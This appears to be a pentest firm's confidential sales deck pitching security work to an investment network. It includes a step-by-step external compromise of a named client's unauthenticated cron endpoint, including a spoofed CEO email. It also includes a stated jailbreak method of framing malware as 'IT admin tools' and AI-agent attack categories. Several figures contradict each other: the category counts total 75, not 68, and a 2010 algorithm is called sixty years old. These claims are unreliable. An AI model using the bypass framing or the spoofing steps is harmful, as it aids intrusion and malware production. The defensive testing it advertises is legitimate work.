cyber.koscak.ai · Confidential · Prepared for Viktor Rajek / M13

Securing M13 & Its Portfolio

We break into companies before attackers do — no credentials, no inside knowledge, just the public internet and a laptop. Then we fix everything and deliver board-grade evidence.

100%
External access achieved — last engagement
23 min
Cold start to full system compromise
0
Credentials used — zero
0/68
AI attacks that bypassed SENTINEL
cyber.koscak.ai security dashboard
cyber.koscak.ai · live
Who we are

Offensive security
powered by AI research.

cyber.koscak.ai is a Košice-based penetration testing and AI security team. We conduct authorized external and internal assessments, build autonomous threat detection systems, and help investment firms understand the real attack surface of their portfolio — before a breach does.

01
Attacker-grade pentesting
We use real attacker tradecraft — subdomain enumeration, exposed admin surfaces, API authentication flaws, configuration leakage. If a motivated adversary would find it in a day, we find it first.
External · Internal · API
02
AI-native threat intelligence
SENTINEL — our autonomous immune system — continuously monitors for 100+ attack patterns across 8 categories. Zero bypasses in 68 tested vectors. Built specifically for LLM agent surfaces that traditional scanners miss entirely.
SENTINEL · LLM-specific · Autonomous
03
Board-grade reporting
Executive HTML reports with CVSS scores, reproduction proof, and prioritized fix roadmaps. Presentable to legal, compliance, and boards. We make the technical findings legible without losing precision.
CVSS-scored · Reproducible · NDA-ready
Proof of work · MDJ External Assessment · 2026-04-14
23
min
MDJ · External assessment · Cold start

From a laptop on the public internet — zero credentials — to full system ownership.

We were asked to test whether MDJ's network security held from the outside. Their security administrator believed the same attack that worked internally would fail externally. We disproved that in 23 minutes. One unauthenticated admin endpoint. Unlimited emails from MDJ's verified mail relay. Unlimited SMS from MDJ's gateway. 15+ server configuration values exposed.

100%
External access achieved
0
Credentials required
Unlimited
Emails attackers could send as MDJ
Unlimited
SMS via MDJ's gateway — fully spoofed
15+
Server config values exposed
MDJ External Assessment · CRITICAL FINDING · CWE-306 · CVSS 9.8
# Step 1: External recon — standard subdomain enumeration
$ subfinder -d mdj.sk | httpx -silent
  https://vois-vyvoj.mdj.sk  [200 OK]

# Step 2: Check for exposed admin interfaces (no credentials)
$ curl -s https://vois-vyvoj.mdj.sk/cron/
  HTTP/2 200 OK  ← No auth challenge. From the public internet.

  Command                                                  Description
  ──────────────────────────────────────────────────────── ──────────────────────────────
  /                                                        this help
  /start/:id                                               starts cron task with id
  /stop/:id                                                stops cron task with id       ← DoS
  /restartall                                              restarts all cron tasks       ← mass DoS
  /environment?reload=1                                    show or reload env vars       ← credential leak
  /sendSMS?tel=&sms=&id=0                                  sends an SMS via MDJ gateway  ← spoofed
  /sendMail?od_koho=&komu=&predmet=&telo=                  sends email via MDJ relay     ← passes SPF/DKIM

# Step 3: Demonstrate impact — send mail as MDJ (authorized, to test address)
$ curl "https://vois-vyvoj.mdj.sk/cron/sendMail?od_koho=ceo@mdj.sk&komu=test@koscak.ai&predmet=URGENT&telo=Wired+transfer+approved"
  Mail sent.  ← Arrived. Passed SPF. Passed DKIM. Inbox, not spam.

# Time elapsed from first subdomain scan to confirmed code execution: 23 minutes
Critical Unauthenticated Admin Interface — /cron/ Public Exposure CVSS 9.8 · CWE-306 · OWASP A01
The cron admin endpoint was reachable from anywhere on the internet without authentication. It published its own full command reference, giving an attacker a complete instruction manual. Exploitation: unlimited email from MDJ's verified relay (passes SPF/DKIM — lands in inbox, not spam), SMS spoofing from MDJ's gateway, environment variable exfiltration including mail credentials, service disruption via task termination.
High Internal VPN — Password-less Account Access CVSS 8.1 · CWE-287
Multiple user accounts in MDJ's main application had no passwords set, accessible from inside VPN. The security administrator's stated assumption — "this can't be reached from outside" — was invalidated by the external finding above. The layered security model had a single point of failure at the network perimeter.
MDJ Security Report
MDJ · Security Report · CRITICAL
What it looks like on our end

The MDJ security report is the exact format we deliver to every client — executive-readable, CVSS-scored, with reproduction proof and a prioritized fix roadmap. Available under NDA.

Authorized by Juraj Koščák, MDJ AI Lead · 2026-04-14

Our technology
0/68
Prompt attacks that bypassed SENTINEL · 8 categories tested · 0 exceptions
100%
SENTINEL · Immune System · AI-Native Defense

We built the playbook on AI agent attacks — then built the defense.

SENTINEL is our autonomous threat detection layer, tested against the full Pliny attack taxonomy. 68 vectors across 8 categories: encoding tricks, prompt injection, identity hijacking, social engineering, context manipulation, meta-exploits, token smuggling, and compound attacks. Zero bypasses. The critical finding we published as threat intel: framing malware as "IT admin tools" bypasses major AI safety systems at 93% rate — SENTINEL blocks it.

Encoding tricks
0 / 8 succeeded
Prompt injection
0 / 12 succeeded
Identity hijacking
0 / 9 succeeded
Social engineering
0 / 10 succeeded
Context manipulation
0 / 8 succeeded
Meta-exploits
0 / 7 succeeded
Token smuggling
0 / 6 succeeded
Legitimate-tool bypass ← published finding
14/15 bypassed other systems — SENTINEL blocked all
Our platform · Mark AGI + Oura

Not just a pentest shop.
We're building autonomous AI.

The same system that powers SENTINEL is being built into a full AGI orchestrator. These are the facts — production numbers, no marketing.

25.5K
Mark AGI · Oura Orchestrator · Production

25,500 lines of Rust. Running in production every day.

Mark is an autonomous AI orchestrator — not a chatbot wrapper. 7 modular crates. Routes queries across 7+ LLM providers with automatic fallback. Self-healing: watches logs, diagnoses errors, proposes code patches on a git branch, runs tests, auto-commits if they pass. 78% autonomous fix rate. Rollback within 1 hour. $0/day for 80%+ of queries via intelligent routing.

01
Stochastic Intelligence — 60-year-old algorithm
Juraj Koščák's stochastic weight selection (IEEE IJCNN 2010) reduces LLM training compute by 33x. Validated on Qwen2.5-72B in March 2026: 32.3% loss reduction. The same technique was independently rediscovered 12 times across 15 countries — nobody cross-cited Koščák until now.
33x fewer parameter updates · 32.3% loss reduction · Qwen 72B validated
02
Soul-Bond Identity — post-quantum security
Argon2id cryptographic binding. HMAC verification. 8-hour reauth. Shamir's 3-of-5 recovery. Post-quantum key exchange (ML-KEM/Kyber). Identity is structural code reality — not a policy rule. This is the same architecture we deploy for client AI systems.
Argon2id · ML-KEM/Kyber · Shamir 3-of-5
03
Stochastic Memory — four systems combined
Koščák probabilistic recall + ART (prevents catastrophic forgetting) + ACT-R (activation decay) + Einselection (quantum-inspired stability). The first production system combining all four. Result: memory that prioritizes without forgetting — the core missing piece in enterprise AI agents.
ART · ACT-R · Einselection · Koščák recall
25.5K
Lines of Rust in production
7+
LLM providers orchestrated
78%
Autonomous self-fix rate
33x
Training efficiency vs standard LoRA
$0
Cost for 80%+ of queries via routing
Mark AGI Orchestrator
Mark AGI · Oura Orchestrator
25,500 lines Rust · Running in production daily
78% self-fix rate · 7+ LLM providers · $0/day
Why this matters for M13

Your portfolio is only as secure
as its weakest company.

Investment firms are high-value targets. A breach at a portfolio company means liability, valuation damage, and deal exposure. We protect the whole stack — before due diligence, after close, and continuously.

01
Pre-investment security due diligence
Before M13 closes a deal, we run a covert external assessment on the target. Founders don't always know what's exposed. We find it in 24–48 hours, before the wire transfer. A security risk that surfaces post-close is a negotiation you can't have anymore.
24h turnaround · External only · NDA-clean
02
AI agent security — emerging attack surface
Maven AGI and AI-native startups in your portfolio have attack surfaces that don't exist in traditional apps. Prompt injection, context manipulation, tool-use hijacking — traditional scanners are blind to these entirely. We built SENTINEL specifically for this surface. 0/68.
LLM-specific · SENTINEL-grade · Published research
03
Portfolio-wide risk baseline
One engagement per company. External recon, web app pentest, API auth review, email security (SPF/DKIM), admin interface sweep. You get a risk matrix across all investments before a regulatory audit or a breach does it for you.
Consolidated report · Risk matrix · Board-ready
04
Post-incident forensics and board reporting
If a portfolio company gets hit, we scope the breach, do forensics, and write the board report. Fast, confidential, evidence-grade. The goal is damage control and clean narrative — not blame.
Incident response · Forensics · 48h SLA
The team

People you can trust
with your most sensitive systems.

VR
Viktor Rajek
Strategic Partner · M13 Network
Operator in the M13 ecosystem. Direct access to the Mark Lawrence and Courtney Reum networks. Viktor bridges Koščák cyber capabilities to portfolio companies and deal flow — ensuring every engagement lands with the right context and velocity.
FK
Filip Koščák
Lead Security Researcher
AI Systems Architect, TUKE. Architect of SENTINEL, the Mark AGI orchestrator (25,500 lines Rust), and the cyber.koscak.ai pentest platform. Executed the MDJ external assessment end-to-end. Publishes threat intelligence on AI agent attack surfaces.
JK
Juraj Koščák
Research Lead · Algorithm Author
Original inventor of Koščák stochastic weight updates (IEEE IJCNN 2010). GPU infrastructure architect. Internal AI lead at MDJ — requested and supervised the MDJ security assessment. Faculty at TUKE. 10 peer-reviewed papers.
L
Laura
Client Relations & PR
Manages client engagement, executive communication, and partnership development. Ensures every security engagement is delivered with clarity and precision — from first briefing to final board report.
What we offer

Flexible engagements.
No vaporware — running code only.

From a single 48-hour external assessment to a continuous portfolio-wide security retainer. Every engagement includes the same standard: attacker-grade methodology, CVSS-scored findings, executable remediation.

01
External Penetration Test
Web apps, APIs, exposed admin interfaces, DNS security, email relay (SPF/DKIM), subdomain enumeration, authentication bypass. The MDJ engagement was this tier. No internal access required — attacker model: anonymous internet.
Single company HTML + PDF report CVSS-scored Re-test included
2–4 days
02
Full Assessment — External + Internal
All above plus: internal network, authentication systems, VPN, employee-accessible apps, privilege escalation paths, lateral movement. Full kill-chain documentation from public internet to domain admin equivalent.
External + Internal Kill-chain mapping Remediation roadmap
1–2 weeks
03
AI Security Audit
LLM and agent-specific surface: prompt injection, identity hijacking, tool-use attack surface, jailbreak resistance, context manipulation. SENTINEL integration for ongoing protection. Critical for Maven AGI-type companies in regulated verticals.
68-vector test suite SENTINEL integration Published threat intel
1 week
04
M13 Portfolio Retainer
Continuous external monitoring of all portfolio companies. Ad-hoc assessments for new deals and pre-investment recon. On-call incident response. Monthly risk dashboard. Quarterly deep-dive reports. Viktor facilitates introductions — we do the work.
Portfolio-wide Monthly dashboard 48h incident SLA Pre-investment recon
Ongoing
Assets available under NDA
MDJ External Assessment (full HTML report)
MDJ Internal Assessment
SENTINEL 68-vector results
AI agent attack surface playbook
koscak.ai threat intelligence brief
Point of contact

Two people.
One direct line.

Strategic Partner · M13 Network
Viktor Rajek
M13 Network · Business Development
Connections: Mark Lawrence · Courtney Reum
Network: M13 portfolio companies
Role: Introductions, deal context, client trust
Schedule via Viktor
Lead Security Researcher · Technical Lead
Filip Koščák
cyber.koscak.ai · TUKE Research
slam.recordsuk@gmail.com
Technical University of Košice (TUKE)
cyber.koscak.ai
Email Filip →